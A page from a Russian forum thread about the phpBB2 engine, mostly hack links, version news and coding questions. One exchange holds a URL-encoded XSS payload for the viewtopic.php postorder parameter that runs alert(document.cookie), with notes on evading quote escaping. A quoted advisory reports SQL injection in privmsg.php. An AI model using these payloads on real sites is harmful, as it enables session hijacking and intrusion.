Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » IkonBoard и другие форумы » Другие форумы » Все о phpBB2

Модерирует : Antuan, Dekker

Antuan (29-10-2004 02:01):  Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

   

NT



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору


Мы переехали в новый топик! Сюда!

 
 

В этой теме обсуждаем форумный движок phpBB


» Полезные Линки:
   » http://www.phpBB.com  - официальный сайт  
   » http://forumimages.com - сайт с графикой для phpBB2
   » http://sourceforge.net/...  -  phpBB 2.0.8a
   » http://www.phpBB.com/phpBB/  - обсуждение и поддержка (english)
   » http://www.phpbbhacks.com  - всевозможные хаки  
   » http://www.phpbbhacks.com/templates.php  - шаблоны для phpBB  
   » http://www.phpbbhacks.com/templatesdemo
   » http://www.phpbb2-users.de/ - довольно хороший сайт про phpBB
   » http://myphpbb.com.ru/ - Неплохой сайт про phpBB, много хаков.
   » http://forum.ru-board.com/...фильтр по форуму "Другие форумы" по теме phpBB
   » http://www.hacksphpbb.ru  - Еще один российский сайт модов (хаков)  
 
» Полезные Хаки:
   » Advanced Quick Reply Hack (Быстрый ответ) [ чинить баг ]
   » Last Post Topic on Index (Название топика с последним ответом на главной странице)
   » Forum Icons (Разные иконки форумов)
   » Double post merge (Склеивание постов)
   » Translit BBCode (Заменяет транслит на кириллицу методами php)
   » eDonkey Link replacer (Добавляет любой текст в звериные линки на форуме)
   » "Хак" для Advanced Quick Reply Hack (Добавляет имя цитируемого юзера)
   » Хак: Замечания к постам (Текст модератора под постом)
   » Хак: Бан в куки (информация о том что ты был забанен пишется еще и в cookies)
 
»  Ответы на вопросы:
   » Не работают куки (cookies)
   » Как в phpBB вставить баннеры и все такое прочее?
   » Форум заменяет русский текст на "лабуду" типа "тест"
   » Advanced Quick Reply добавляет лишнюю строку при цитировании
   » Как отредактировать условия регистрации?
   » Как убрать надпись о том что если вам меньше 13ти лет...?

Всего записей: 1861 | Зарегистр. 27-07-2002 | Отправлено: 00:17 04-09-2002 | Исправлено: xntx, 23:46 28-10-2004
4Life



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Возможно ли изменять бєкгроунд текста в сообщении?

----------
▓▓▓Made in Ukraine▓▓▓

Всего записей: 766 | Зарегистр. 05-06-2003 | Отправлено: 20:54 07-03-2004
alexhemp



упал с пальмы
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx
Приводя JavaScript код, я имел ввиду, что далее его нужно представлять в виде URLENCODED как в примере на securitylab

Всего записей: 1945 | Зарегистр. 13-12-2001 | Отправлено: 00:45 09-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
alexhemp
всмысле урлэнкодить 2 раза? потому что если один раз, то сам мотор php его превратит в обычные символы следуя стандартам php

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 01:16 09-03-2004
hamshen

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
А кто-нибудь в курсе, когда выйдет релиз phpBB 2.2 ? Хотя бы примерно.

----------
Хорошие умирают молодыми, но плохие умирают уродливо.

Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 22:20 09-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
hamshen
имхо, в этом году его можно не ждать...

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 23:13 09-03-2004
alexhemp



упал с пальмы
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx
Не знаю, не знаю

Код:
 
Exploit:
URL: http://site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65
%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C
 
note unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6
F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C')
== '"><script>alert(document.cookie)</script><'
 

 
Там как раз первый символ - кавычки, и они отлично вставляются.
Или я не вьехал?
Я просто не стал делать escape а изложил свое представление как эту дырку можно использовать куском псевдо-кода.

Всего записей: 1945 | Зарегистр. 13-12-2001 | Отправлено: 23:59 09-03-2004
hamshen

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx
а в следующем?

----------
Хорошие умирают молодыми, но плохие умирают уродливо.

Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 17:11 10-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
alexhemp
у меня этот код дает...

Цитата:
\"><script>alert(document.cookie)</script>

тоесть кавычка слешится, а значит нах он не нужен...
 
hamshen
создается сопутсвующий вопрос, а зачем?
чем тебе сейчашешнего мало?

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 22:20 10-03-2004
alexhemp



упал с пальмы
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx
Вообще-то кавычки экранируют слешами в PHP, а в JavaScript это не так.
Опять-же тренироваться нужно на форуме с дыркой ;-)
 
У меня на тестовом форуме эта иньекция дает
 

Код:
 
<a class="maintitle" href="viewtopic.php?t=20&amp;start=0&amp;postdays=0&amp;postorder=\"><script>alert(document.cookie)</script><&amp;highlight=&amp;sid=4224fc1d273db0b99adc246082d5a7ae">
 

 
Жиным я выделил успешную "инекцию" JavaScript кода.
Кавычка как видно отслешена, но это всего-лишь дает параметр "postorder=/" в выводе страницы.
 
В общем я так и не понял, причем здесь экранирование кавычки, если в HTML коде это самое экранирование не работает в принципе.
 
Добавлено
Если ты имеешь ввиду, что строку вставить в кусок JavaScript не выйдет, то я думаю, что можно будет обойтись без кавычек соорудив конструкицю типа  
chr(xx)+chr(yy)+chr(zz)
Будет длинно конечно, но обойтись без кавычек можно.

Всего записей: 1945 | Зарегистр. 13-12-2001 | Отправлено: 00:55 11-03-2004
hamshen

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx

Цитата:
создается сопутсвующий вопрос, а зачем?  
чем тебе сейчашешнего мало?

В phpBB 2.2 будет куча новых фичеров. Да и кот там похоже будет переписан изрядно, если не основательно.
Я немного модифицировал версию 2.0.6 (мне нужна поддержка UTF-8) и теперь думаю - изменять его дальше (т.е. добавлять какие-то фичеры которые мне нужны) или же ждать выхода 2.2.


----------
Хорошие умирают молодыми, но плохие умирают уродливо.

Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 16:53 11-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
hamshen
изменяй дальше...
 
alexhemp

Цитата:
Если ты имеешь ввиду, что строку вставить в кусок JavaScript не выйдет, то я думаю, что можно будет обойтись без кавычек соорудив конструкицю типа  
chr(xx)+chr(yy)+chr(zz)  
Будет длинно конечно, но обойтись без кавычек можно.

a, ну да, ты прав... я как то не подумал что там int нужен а не str

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 22:17 11-03-2004
hamshen

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx

Цитата:
изменяй дальше...  

Спасибо. Я уже и сам к такому выводу пришел.

----------
Хорошие умирают молодыми, но плохие умирают уродливо.

Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 12:20 12-03-2004
hamshen

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
В файле sessions.php есть такая строка

Код:
setcookie($cookiename . '_sid', $session_id, 0, $cookiepath, $cookiedomain, $cookiesecure);

В чем ее смысл?

----------
Хорошие умирают молодыми, но плохие умирают уродливо.

Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 19:46 12-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
hamshen

Цитата:
setcookie ( string name [, string value [, int expire [, string path [, string domain [, int secure]]]]] )

значит удалить куку (дословно: сделать чтоб истекла прямо сейчас)

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 00:14 15-03-2004
Jovani



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Кто не в курсе: Вышла phpBB 2.0.7
 
Изменения относительно 2.0.6:
Fixed several vulnerabilities in modcp - Robert Lavierck  
Changed whois lookup address within admin index  
Fixed potential vulnerability in viewtopic postorder - 2.0.6d  
Updates to cope with Zend Optimizer 2.5 problems - 2.0.6d - jetset  
Force specialcharing of redirect variable in login - Pit  
Fixed potential vulnerability in viewtopic postdays - GulfTech Security Research  
Fixed potential vulnerability in viewforum topicdays - GulfTech Security Research  
Fixed potential vulnerability in modcp  
Fixed potential vulnerability in avatar gallery

Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 06:31 16-03-2004
Vorgal

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
А есть ли какой-нибудь хак рейтинга тем?
Т. е. нужно просто уметь оценить тему за, против...

Всего записей: 24 | Зарегистр. 22-02-2002 | Отправлено: 22:41 22-03-2004
3xp0



Moderator
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Собственно я кучу хаков пересмотрел. Искал портал-хак. Их много - согласен.
Но мне нужен такой портал хак, чтобы в нем на главной странице, где публикуются новости, можно было писать длинные новости и вставлять картинки, графику и вообще что угодно.
К сожалению все портали, которые я нашел обрезают новости и так далее.
Кто-нить видел подобное, что я ище? Заранее спасибо.

Всего записей: 6398 | Зарегистр. 22-09-2002 | Отправлено: 09:52 30-03-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Опять вот...

Цитата:
29 марта 2004

Программа: phpBB 2.0.8  
Опасность: Высокая  
Наличие эксплоита: Да  
Описание: Уязвимость в проверке правильности входных данных обнаружена в phpBB в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код.  
 
Пример:

 
URL производителя: http://www.phpbb.com/  
 
Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.
 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 13:15 30-03-2004 | Исправлено: Svarga, 14:24 30-03-2004
Jovani



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Svarga
Похоже кто-то конкретно "взялся" за phpbb
 
Дырку уже залатали:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=185180

Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 23:37 30-03-2004
Mercuree



Junior Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
обновлён Double post merge (Склеивание постов) до 1.0.1
 
комментарии как всегда приветствуются.

Всего записей: 138 | Зарегистр. 16-11-2002 | Отправлено: 02:13 31-03-2004
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

Компьютерный форум Ru.Board » IkonBoard и другие форумы » Другие форумы » Все о phpBB2
Antuan (29-10-2004 02:01):


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru